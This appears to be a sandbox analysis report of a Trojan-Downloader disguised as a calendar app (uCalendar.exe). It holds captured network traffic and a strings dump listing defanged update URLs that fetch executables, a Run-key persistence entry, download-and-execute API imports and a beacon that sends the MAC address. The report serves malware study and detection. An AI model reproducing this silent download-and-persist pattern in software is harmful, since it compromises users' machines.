GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server: Tengine..Date: Wed, 14 Jan 2015 11:51:34 GMT..Content-Type: image/gif..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=RkY9DbJslnYCAcGK9OdJn7XJ; expires=Sat, 11-Jan-25 11:51:34 GMT; path=/; domain=.mmstat.com..Set-Cookie: sca=e1a96173; path=/; domain=.cnzz.mmstat.com..Set-Cookie: atpsida=6b6110718aa3354e88624c9e_1421236294; expires=Sat, 11-Jan-25 11:51:34 GMT; path=/; domain=.cnzz.mmstat.com..Location: http://pcookie.cnzz.com/app.gif?&cna=RkY9DbJslnYCAcGK9OdJn7XJ..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cache..GIF89a.............!.......,...........L..;....

GET /?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: k780.xiaoxinrili.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.2

Date: Wed, 14 Jan 2015 11:49:49 GMT

Content-Type: application/json; charset=utf-8;

Content-Length: 3359

Connection: keep-alive

X-Cache-CFC: HIT - - httpGETk780.xiaoxinrili.com/?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json

{"success":"1","result":[{"weaid":"1","days":"2015-01-14","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"2.../-5...","humidity":"0.../0...","weather":"............","weather_icon":"hXXp://api.k780.com:88/upload/weather/d/14.gif","weather_icon1":"hXXp://api.k780.com:88/upload/weather/n/53.gif","wind":"...............","winp":"......","temp_high":"2","temp_low":"-5","humi_high":"0","humi_low":"0","weatid":"15","weatid1":"33","windid":"124","winpid":"125"},{"weaid":"1","days":"2015-01-15","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"3.../-3...","humidity":"0.../0...","weather":"...","weather_icon":"http://api.k780.com:88/upload/weather/d/53.gif","weather_icon1":"hXXp://api.k780.com:88/upload/weather/n/53.gif","wind":"........................","winp":".........3-4...","temp_high":"3","temp_low":"-3","humi_high":"0","humi_low":"0","weatid":"33","weatid1":"33","windid":"145","winpid":"131"},{"weaid":"1","days":"2015-01-16","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"5.../-6...","humidity":"0.../0...","weather":"............","weather_icon":"hXXp://api.k780.com:88/upload/weather/d/1.gif","weather_icon1":"http://api.k780.com:88/upload/weather/n/0.gif","wind":"......","winp":"4-5......3-4...","temp_high":"5","temp_low":"-6","humi_high":"0","humi_low":"0","weatid":"2","weatid1":"1","windid":"20","winpid":"54"},{"weaid":"1","days":"2015-01-17","week":".........","cityno":"beijing","ci

<<< skipped >>>

GET /?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: k780.xiaoxinrili.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.2

Date: Wed, 14 Jan 2015 11:49:52 GMT

Content-Type: application/json; charset=utf-8;

Content-Length: 3359

Connection: keep-alive

X-Cache-CFC: HIT - - httpGETk780.xiaoxinrili.com/?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json

{"success":"1","result":[{"weaid":"1","days":"2015-01-14","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"2.../-5...","humidity":"0.../0...","weather":"............","weather_icon":"hXXp://api.k780.com:88/upload/weather/d/14.gif","weather_icon1":"hXXp://api.k780.com:88/upload/weather/n/53.gif","wind":"...............","winp":"......","temp_high":"2","temp_low":"-5","humi_high":"0","humi_low":"0","weatid":"15","weatid1":"33","windid":"124","winpid":"125"},{"weaid":"1","days":"2015-01-15","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"3.../-3...","humidity":"0.../0...","weather":"...","weather_icon":"http://api.k780.com:88/upload/weather/d/53.gif","weather_icon1":"hXXp://api.k780.com:88/upload/weather/n/53.gif","wind":"........................","winp":".........3-4...","temp_high":"3","temp_low":"-3","humi_high":"0","humi_low":"0","weatid":"33","weatid1":"33","windid":"145","winpid":"131"},{"weaid":"1","days":"2015-01-16","week":".........","cityno":"beijing","citynm":"......","cityid":"101010100","temperature":"5.../-6...","humidity":"0.../0...","weather":"............","weather_icon":"hXXp://api.k780.com:88/upload/weather/d/1.gif","weather_icon1":"http://api.k780.com:88/upload/weather/n/0.gif","wind":"......","winp":"4-5......3-4...","temp_high":"5","temp_low":"-6","humi_high":"0","humi_low":"0","weatid":"2","weatid1":"1","windid":"20","winpid":"54"},{"weaid":"1","days":"2015-01-17","week":".........","cityno":"beijing","ci

<<< skipped >>>

GET /stat.htm?id=1253322244&r=&lg=en-us&ntime=none&cnzz_eid=307117902-1421236297-&showp=1276x846&t=&h=1&rnd=31178880 HTTP/1.1

Accept: */*

Referer: hXXp://down.xiaoxinrili.com/hezi/xxurl.html?iexplore.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: z9.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine/1.4.1

Date: Wed, 14 Jan 2015 11:51:38 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Tue, 28 May 2013 02:57:17 GMT

Connection: close

Accept-Ranges: bytes

GIF89a.............!.......,...........D..;..

GET /daohang/xttj.html?%original file name%.exe HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: update.xiaoxinrili.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/html

Content-Encoding: gzip

Last-Modified: Mon, 25 Aug 2014 06:09:09 GMT

Accept-Ranges: bytes

ETag: "d81386152bc0cf1:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:20 GMT

Content-Length: 585

.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?"...Ey..'..y6;z|.....jv.....Vm....>...........t.......n.f.x5_........>.wo..^......QZf..uv....w...5C.....^/.........OSK......N........Ve.Y....4.>J?.,.U.."_....fmQ-......H?J......../.q...wU.m..^..4[.[....Nf.eJ...{.0..bZ-..{;;...}....~..Z..f..`............]9.MA.....b...{j ..{....c....:.../...;w.#Dt.v.~$ {.el..D..n..&.....q....to......?........Y:..s....J..=...qV_..g....B.-A*..iV.'....}...{H?.......?.....?..................a.5....5 j.^.4.IU.....Z...wi4.....7NhTw...e....F)_.....HTTP/1.1 200 OK..Content-Type: text/html..Content-Encoding: gzip..Last-Modified: Mon, 25 Aug 2014 06:09:09 GMT..Accept-Ranges: bytes..ETag: "d81386152bc0cf1:0"..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:20 GMT..Content-Length: 585...............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?"...Ey..'..y6;z|.....jv.....Vm....>...........t.......n.f.x5_........>.wo..^......QZf..uv....w...5C.....^/.........OSK......N........Ve.Y....4.>J?.,.U.."_....fmQ-......H?J......../.q...wU.m..^..4[.[....Nf.eJ...{.0..bZ-..{;;...}....~..Z..f..`............]9.MA.....b...{j ..{....c....:.../...;w.#Dt.v.~$ {.el..D..n..&.....q....to......?........Y:..s....J..=...qV_..g....B.-A*..iV.'....}...{H?.......?.....?..................a.5....5 j.^.4.IU.....Z...wi4.....7NhTw...e....F)_.........

<<< skipped >>>

GET /tj/a1.html?%original file name%.exe&type=silent&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno= HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: update.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1

HTTP/1.1 200 OK

Content-Type: text/html

Content-Encoding: gzip

Last-Modified: Thu, 25 Jul 2013 08:30:48 GMT

Accept-Ranges: bytes

ETag: "51fbc6431189ce1:0"

Vary: Accept-Encoding

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:29 GMT

Content-Length: 202

.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?".7..X.iSO?.h...Gw.6......?.O.......j..=..g......../..'..........."....d..k...........x.&"d...HTTP/1.1 200 OK..Content-Type: text/html..Content-Encoding: gzip..Last-Modified: Thu, 25 Jul 2013 08:30:48 GMT..Accept-Ranges: bytes..ETag: "51fbc6431189ce1:0"..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:29 GMT..Content-Length: 202...............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?".7..X.iSO?.h...Gw.6......?.O.......j..=..g......../..'..........."....d..k...........x.&"d.....

Map

The Trojan-Downloader connects to the servers at the folowing location(s):

Strings from Dumps

uCalendar.exe_1840:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

t.jPhm

t.jPhm

tGHt.Ht&

tGHt.Ht&

CNotSupportedException

CNotSupportedException

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

ntdll.dll

ntdll.dll

kernel32.dll

kernel32.dll

%s%s.dll

%s%s.dll

%s (%s:%d)

%s (%s:%d)

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

comctl32.dll

comctl32.dll

comdlg32.dll

comdlg32.dll

shell32.dll

shell32.dll

hhctrl.ocx

hhctrl.ocx

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

commctrl_DragListMsg

commctrl_DragListMsg

CCmdTarget

CCmdTarget

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

mfcm90.dll

mfcm90.dll

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

user32.dll

user32.dll

ole32.dll

ole32.dll

Visual C CRT: Not enough memory to complete call to strerror.

Visual C CRT: Not enough memory to complete call to strerror.

Please contact the application's support team for more information.

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

operator

operator

GetProcessWindowStation

GetProcessWindowStation

USER32.DLL

USER32.DLL

OLEACC.dll

OLEACC.dll

X-

X-

3.6.23.1

3.6.23.1

SQLite format 3

SQLite format 3

CREATE TABLE sqlite_master(

CREATE TABLE sqlite_master(

sql text

sql text

CREATE TEMP TABLE sqlite_temp_master(

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY0

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY0

%s%d bytes

%s%d bytes

No start tag for end tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

End tag '%s' at offset %d does not match start tag '%s' at offset %d

End tag '%s' at offset %d does not match start tag '%s' at offset %d

Element '%s' at offset %d not ended

Element '%s' at offset %d not ended

%s at offset %d unterminated

%s at offset %d unterminated

Incorrect %s at offset %d

Incorrect %s at offset %d

HTTP/1.0

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Content-Length: %d

Content-Length: %d

Content-Disposition: form-data; name="%s"

Content-Disposition: form-data; name="%s"

Content-Disposition: form-data; name="%s"; filename="%s"

Content-Disposition: form-data; name="%s"; filename="%s"

Content-Type: %s

Content-Type: %s

https

https

hXXp://update.xiaoxinrili.com/FMTFilter.txt

hXXp://update.xiaoxinrili.com/FMTFilter.txt

hXXp://update.xiaoxinrili.com/FMTFilterinset.txt

hXXp://update.xiaoxinrili.com/FMTFilterinset.txt

Microsoft Windows NT 4.0

Microsoft Windows NT 4.0

Microsoft Windows 95

Microsoft Windows 95

Microsoft Windows 98

Microsoft Windows 98

Microsoft Windows Me

Microsoft Windows Me

Microsoft Windows 2000

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows XP

Microsoft Windows XP Professional x64 Edition

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003

Microsoft Windows Server 2003

Microsoft Windows Server 2003 R2

Microsoft Windows Server 2003 R2

Microsoft Windows Vista

Microsoft Windows Vista

Microsoft Windows Server 2008

Microsoft Windows Server 2008

Microsoft Windows 7

Microsoft Windows 7

Microsoft Windows Server 2008 R2

Microsoft Windows Server 2008 R2

Chrome_WidgetWin_1

Chrome_WidgetWin_1

16777215

16777215

-2147483630

-2147483630

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\Run

data\Install.ini

data\Install.ini

huangli.xml

huangli.xml

wdj_connection_wrapper.dll

wdj_connection_wrapper.dll

/wdj_connection_wrapper.dll

/wdj_connection_wrapper.dll

hXXp://VVV.baidu.com

hXXp://VVV.baidu.com

hXXp://k780.xiaoxinrili.com/?app=weather.future&weaid=[ID]&appkey=[skey]&sign=[sign]&format=json

hXXp://k780.xiaoxinrili.com/?app=weather.future&weaid=[ID]&appkey=[skey]&sign=[sign]&format=json

[skey]

[skey]

Weather_none.png

Weather_none.png

Replace.dll

Replace.dll

uCalExternal.exe

uCalExternal.exe

%d:%d

%d:%d

Temper%d.png

Temper%d.png

Temper-.png

Temper-.png

hXXp://VVV.xiaoxinrili.com/

hXXp://VVV.xiaoxinrili.com/

hXXp://update.xiaoxinrili.com/htmlinset1.txt

hXXp://update.xiaoxinrili.com/htmlinset1.txt

hXXp://update.xiaoxinrili.com/PopBoxSmall.txt

hXXp://update.xiaoxinrili.com/PopBoxSmall.txt

hXXp://update.xiaoxinrili.com/PopBoxBig.txt

hXXp://update.xiaoxinrili.com/PopBoxBig.txt

hXXp://update.xiaoxinrili.com/Version.txt

hXXp://update.xiaoxinrili.com/Version.txt

hXXp://count.xiaoxinrili.com/startup?appname=5bCP5paw5pel5Y6G&version=4.0&sid=[mac]&pos=[way]&s=[macmd5]

hXXp://count.xiaoxinrili.com/startup?appname=5bCP5paw5pel5Y6G&version=4.0&sid=[mac]&pos=[way]&s=[macmd5]

hXXp://count.xiaoxinrili.com/startup?appname=cmlsaXF1aWNrZW4=&version=4.0&sid=[mac]&pos=[way]&s=[macmd5]

hXXp://count.xiaoxinrili.com/startup?appname=cmlsaXF1aWNrZW4=&version=4.0&sid=[mac]&pos=[way]&s=[macmd5]

hXXp://update.xiaoxinrili.com/appImg/appimg.txt

hXXp://update.xiaoxinrili.com/appImg/appimg.txt

hXXp://update.xiaoxinrili.com/appImg/AppCloud4.2.xml

hXXp://update.xiaoxinrili.com/appImg/AppCloud4.2.xml

hXXp://update.xiaoxinrili.com/update.txt

hXXp://update.xiaoxinrili.com/update.txt

hXXp://update.xiaoxinrili.com/Install.txt

hXXp://update.xiaoxinrili.com/Install.txt

update.xiaoxinrili.com

update.xiaoxinrili.com

hXXp://update.xiaoxinrili.com/md5.txt

hXXp://update.xiaoxinrili.com/md5.txt

hXXp://update.xiaoxinrili.com/uCalhtml.txt

hXXp://update.xiaoxinrili.com/uCalhtml.txt

hXXp://update.xiaoxinrili.com/weather.txt

hXXp://update.xiaoxinrili.com/weather.txt

/html.exe

/html.exe

/inst.exe

/inst.exe

/tmp.exe

/tmp.exe

/riliUpdate.exe

/riliUpdate.exe

hXXp://7day.xiaoxinrili.com/city

hXXp://7day.xiaoxinrili.com/city

hXXp://m.weather.com.cn/data/

hXXp://m.weather.com.cn/data/

hXXp://VVV.weather.com.cn/data/sk/

hXXp://VVV.weather.com.cn/data/sk/

hXXp://7day.xiaoxinrili.com/v2

hXXp://7day.xiaoxinrili.com/v2

20151007

20151007

sysexe

sysexe

dlurl

dlurl

?skq=%d

?skq=%d

bkimage="beiwanglubj.png" inset="0,0,0,0"

bkimage="beiwanglubj.png" inset="0,0,0,0"

.png' dest='4,4,59,59'"

.png' dest='4,4,59,59'"

file='sky_aero.png' corner='40,8,8,8'

file='sky_aero.png' corner='40,8,8,8'

riliUpdate.exe

riliUpdate.exe

riliquicken.exe

riliquicken.exe

uCalHtml.exe

uCalHtml.exe

tmp.exe

tmp.exe

inst.exe

inst.exe

html.exe

html.exe

uiconfig.txt

uiconfig.txt

update.exe

update.exe

data\weather.dat

data\weather.dat

data\Config.ini

data\Config.ini

niaojiao.wav

niaojiao.wav

note.db3

note.db3

%ddd|

%ddd|

jintian3.png

jintian3.png

%d/d/d

%d/d/d

%s(%s)

%s(%s)

dd

dd

hXXp://VVV.vckbase.com/index.php/video/listview/fid/1/sid/4

hXXp://VVV.vckbase.com/index.php/video/listview/fid/1/sid/4

xtest.xml

xtest.xml

http\shell\open\command

http\shell\open\command

AppCloud.xml

AppCloud.xml

M-d-d

M-d-d

delete from tasklist where idkey='%s';

delete from tasklist where idkey='%s';

S_11.png

S_11.png

S_22.png

S_22.png

jj.png

jj.png

update tasklist set stitle= '%s', sdata='%s', warn_ri='%s', sWritetime='%s', warn_time='%s', weekwarn='%s', warn_mode='%d', warn_type='%d', is_warn='%d', warn_day='%d' where idkey=%d;

update tasklist set stitle= '%s', sdata='%s', warn_ri='%s', sWritetime='%s', warn_time='%s', weekwarn='%s', warn_mode='%d', warn_type='%d', is_warn='%d', warn_day='%d' where idkey=%d;

%d-d-d

%d-d-d

idkey

idkey

.png"

.png"

jj.png"

jj.png"

float="true" pos="240,10,260,30" bkimage="file='del.png'" tooltip="

float="true" pos="240,10,260,30" bkimage="file='del.png'" tooltip="

M-d-d d:d:d

M-d-d d:d:d

select max(idkey) AS maxId from tasklist

select max(idkey) AS maxId from tasklist

create table tasklist (idkey integer primary key, stitle , sdata , warn_ri, sWritetime, warn_time,

create table tasklist (idkey integer primary key, stitle , sdata , warn_ri, sWritetime, warn_time,

insert into tasklist values(NULL, '%s', '%s', '%s', '%s', '%s', '%s','%d','%d','%d','%d');

insert into tasklist values(NULL, '%s', '%s', '%s', '%s', '%s', '%s','%d','%d','%d','%d');

d:d:d

d:d:d

xweatherInfo.xml

xweatherInfo.xml

ie.xml

ie.xml

hXXp://update.xiaoxinrili.com/tj.html?

hXXp://update.xiaoxinrili.com/tj.html?

hXXp://update.xiaoxinrili.com/qian.html

hXXp://update.xiaoxinrili.com/qian.html

hXXp://update.xiaoxinrili.com/shan.html

hXXp://update.xiaoxinrili.com/shan.html

hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?

hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?

[macmd5]

[macmd5]

hXXp://update.xiaoxinrili.com/qian.html?

hXXp://update.xiaoxinrili.com/qian.html?

hXXp://down.xiaoxinrili.com/hezi/xxurl.html?

hXXp://down.xiaoxinrili.com/hezi/xxurl.html?

file='menu_bk.png' corner='40,8,8,8'

file='menu_bk.png' corner='40,8,8,8'

Festival.xml

Festival.xml

infoMenu.xml

infoMenu.xml

tclock.ini

tclock.ini

UILoginFrame

UILoginFrame

tray_xp_yes.png

tray_xp_yes.png

tray_xp_no.png

tray_xp_no.png

tray_yes.png

tray_yes.png

tray_no.png

tray_no.png

rundll32.exe /d shell32.dll,Control_RunDLL timedate.cpl

rundll32.exe /d shell32.dll,Control_RunDLL timedate.cpl

xSetInfo.xml

xSetInfo.xml

d:d

d:d

d:d

d:d

d-d-d

d-d-d

132.163.4.101

132.163.4.101

hl.xml

hl.xml

InputBox.xml

InputBox.xml

xwarnTip.xml

xwarnTip.xml

msgwnd.xml

msgwnd.xml

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT)

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT)

shutdown.xml

shutdown.xml

xShutdown.xml

xShutdown.xml

xjiaqi.xml

xjiaqi.xml

pointwnd2.xml

pointwnd2.xml

360ProgressF.png

360ProgressF.png

1.png

1.png

apptool.xml

apptool.xml

pos="44, 3, 58, 19" float="true" bkimage="delapp2.png" hotimage="delapp1.png"

pos="44, 3, 58, 19" float="true" bkimage="delapp2.png" hotimage="delapp1.png"

_del.png" hotimage="

_del.png" hotimage="

del.png"

del.png"

_f1.png" selectedimage="

_f1.png" selectedimage="

_f2.png" group="asa1" selected="true"

_f2.png" group="asa1" selected="true"

_f2.png" group="asa1"

_f2.png" group="asa1"

pos="43, 0, 68, 25" float="true" bkimage="addapp.png" hotimage="addapph.png"

pos="43, 0, 68, 25" float="true" bkimage="addapp.png" hotimage="addapph.png"

1.png" hotimage="

1.png" hotimage="

2.png"

2.png"

2.png

2.png

addapph.png

addapph.png

addapp.png

addapp.png

hXXp://update.xiaoxinrili.com/daohang/tc/

hXXp://update.xiaoxinrili.com/daohang/tc/

iebox.xml

iebox.xml

xTipLayer11.xml

xTipLayer11.xml

xTipLayer.xml

xTipLayer.xml

hXXp://update.xiaoxinrili.com/tc/youxiajiao.html

hXXp://update.xiaoxinrili.com/tc/youxiajiao.html

xminiTip.xml

xminiTip.xml

mobileTip.xml

mobileTip.xml

pointwnd0.xml

pointwnd0.xml

hXXp://

hXXp://

hXXp://update.xiaoxinrili.com/tc/fmt.html

hXXp://update.xiaoxinrili.com/tc/fmt.html

xieminiTip.xml

xieminiTip.xml

Setwnd.xml

Setwnd.xml

e:\duilib\bin\uCalendar.pdb

e:\duilib\bin\uCalendar.pdb

GetCPInfo

GetCPInfo

GetConsoleOutputCP

GetConsoleOutputCP

GetProcessHeap

GetProcessHeap

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

UnhookWindowsHookEx

UnhookWindowsHookEx

GetKeyState

GetKeyState

SetWindowsHookExA

SetWindowsHookExA

CreateDialogIndirectParamA

CreateDialogIndirectParamA

USER32.dll

USER32.dll

GetViewportExtEx

GetViewportExtEx

SetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

SetViewportExtEx

ScaleViewportExtEx

ScaleViewportExtEx

GDI32.dll

GDI32.dll

COMDLG32.dll

COMDLG32.dll

WINSPOOL.DRV

WINSPOOL.DRV

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

RegCreateKeyExA

RegCreateKeyExA

RegDeleteKeyA

RegDeleteKeyA

RegEnumKeyA

RegEnumKeyA

RegOpenKeyA

RegOpenKeyA

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

COMCTL32.dll

COMCTL32.dll

SHLWAPI.dll

SHLWAPI.dll

oledlg.dll

oledlg.dll

OLEAUT32.dll

OLEAUT32.dll

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD0@Z

?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD0@Z

?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z

?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z

?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ

?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ

?SetWebBrowserEventHandler@CWebBrowserUI@DuiLib@@QAEXPAVCWebBrowserEventHandler@2@@Z

?SetWebBrowserEventHandler@CWebBrowserUI@DuiLib@@QAEXPAVCWebBrowserEventHandler@2@@Z

?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ

?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ

?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z

?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z

?Refresh@CWebBrowserUI@DuiLib@@QAEXXZ

?Refresh@CWebBrowserUI@DuiLib@@QAEXXZ

ui_d.dll

ui_d.dll

InternetOpenUrlA

InternetOpenUrlA

HttpQueryInfoA

HttpQueryInfoA

HttpOpenRequestA

HttpOpenRequestA

HttpSendRequestA

HttpSendRequestA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpSendRequestExA

HttpSendRequestExA

HttpEndRequestA

HttpEndRequestA

WININET.dll

WININET.dll

DesktopCalendar.dll

DesktopCalendar.dll

WINMM.dll

WINMM.dll

UxTheme.dll

UxTheme.dll

IPHLPAPI.DLL

IPHLPAPI.DLL

WS2_32.dll

WS2_32.dll

.PAVCOleException@@

.PAVCOleException@@

.PAVCObject@@

.PAVCObject@@

.PAVCMemoryException@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.?AVCNotSupportedException@@

.?AVCTestCmdUI@@

.?AVCTestCmdUI@@

.?AVCCmdUI@@

.?AVCCmdUI@@

.PAVCUserException@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCResourceException@@

.PAVCArchiveException@@

.PAVCArchiveException@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.PAVCFileException@@

.PAVCFileException@@

.PAVCOleDispatchException@@

.PAVCOleDispatchException@@

%u\j%u\

%u\j%u\

zcÁ

zcÁ

.?AVCCmdTarget@@

.?AVCCmdTarget@@

SQLITE_

SQLITE_

d-d-d d:d:d

d-d-d d:d:d

failed to allocate %u bytes of memory

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

failed memory resize %u to %u bytes

922337203685477580

922337203685477580

API call with %s database connection pointer

API call with %s database connection pointer

RowKey

RowKey

%s\etilqs_

%s\etilqs_

OsError 0x%x (%u)

OsError 0x%x (%u)

invalid page number %d

invalid page number %d

2nd reference to page %d

2nd reference to page %d

Failed to read ptrmap key=%d

Failed to read ptrmap key=%d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

